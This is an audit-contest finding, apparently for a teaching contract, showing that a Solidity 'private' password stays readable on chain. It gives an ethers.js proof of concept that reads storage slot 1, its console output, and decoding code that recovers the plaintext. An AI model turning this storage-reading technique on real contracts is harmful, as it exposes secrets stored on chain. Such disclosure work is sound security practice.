Submission Details
Severity: high
Valid

Private variables are visible

Summary

Private variables are visible because all data on the Ethereum blockchain is public. Marking a variable private is useful when you want to save gas, since the compiler does not generate a getter function for it as it does for public variables.

Vulnerability Details

The s_password variable is visible. Using ethers.js, it is possible to read any storage slot; in this case the password is in the second slot, which by zero-based index is slot number 1.

POC

ViewStorage.js

const ethers = require('ethers');

async function readSlot1() {
  // Connect to a provider (for example, a local node or a service like Infura)
  const provider = new ethers.JsonRpcProvider('RPC_NODE_URL');
  // Address of the contract whose storage slot you want to read
  const contractAddress = '0x...'; // Replace with the actual contract address
  // Read the content of slot 1 (the second slot, where s_password is stored)
  const data = await provider.getStorage(contractAddress, 1);
  console.log('Password is:', data);
}

// Report RPC or address errors instead of leaving the promise rejection unhandled
readSlot1().catch(console.error);

Console

whitehat@cbe558dc2266:~/2023-10-PasswordStore$ node test/ViewStorage.js
Password is: 0x4d7950617373776f726400000000000000000000000000000000000000000014
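
The raw word printed above is already the plaintext in Solidity's standard string storage layout, which the following added example decodes (it is not part of the original submission; the function name decodeStringSlot is hypothetical, and the sample word is rebuilt from the console output with its zero padding made explicit):

```javascript
// Added example: decode a Solidity `string` storage slot as returned by getStorage().
// Solidity storage layout for `string`/`bytes`:
//   - 31 bytes or fewer: data is left-aligned in the slot and the
//     lowest-order byte holds length * 2.
//   - 32 bytes or more: the slot holds length * 2 + 1 and the data
//     lives at keccak256(slot), which needs further storage reads.
function decodeStringSlot(slotHex) {
  const hex = slotHex.replace(/^0x/, '');
  if (!/^[0-9a-fA-F]{64}$/.test(hex)) {
    throw new Error('expected a 32-byte hex word');
  }
  const word = Buffer.from(hex, 'hex');
  const lastByte = word[31];

  if (lastByte & 1) {
    // Long string: only the length is recoverable from this slot alone.
    const length = (BigInt('0x' + hex) - 1n) / 2n;
    return { kind: 'long', length: Number(length), value: null };
  }

  const length = lastByte / 2;
  if (length > 31) {
    throw new Error('malformed short-string slot');
  }
  return {
    kind: 'short',
    length,
    value: word.subarray(0, length).toString('utf8'),
  };
}

// Same 32-byte word as the console output on this page:
// 10 data bytes, zero padding, then 0x14 (= 10 * 2) in the last byte.
const SLOT_1 = '0x' + '4d7950617373776f7264'.padEnd(62, '0') + '14';

console.log(decodeStringSlot(SLOT_1));
```

The last byte 0x14 gives a length of 10 bytes, and those 10 bytes are the ASCII password, so marking s_password private adds no confidentiality.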

Impact

The password is visible, and anyone can use it if they know where to use it. High.

Tools Used

Ethers.js and Auditor-Toolbox

Recommendations

Do not implement this functionality at all.

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case, private doesn't mean secret/confidential.
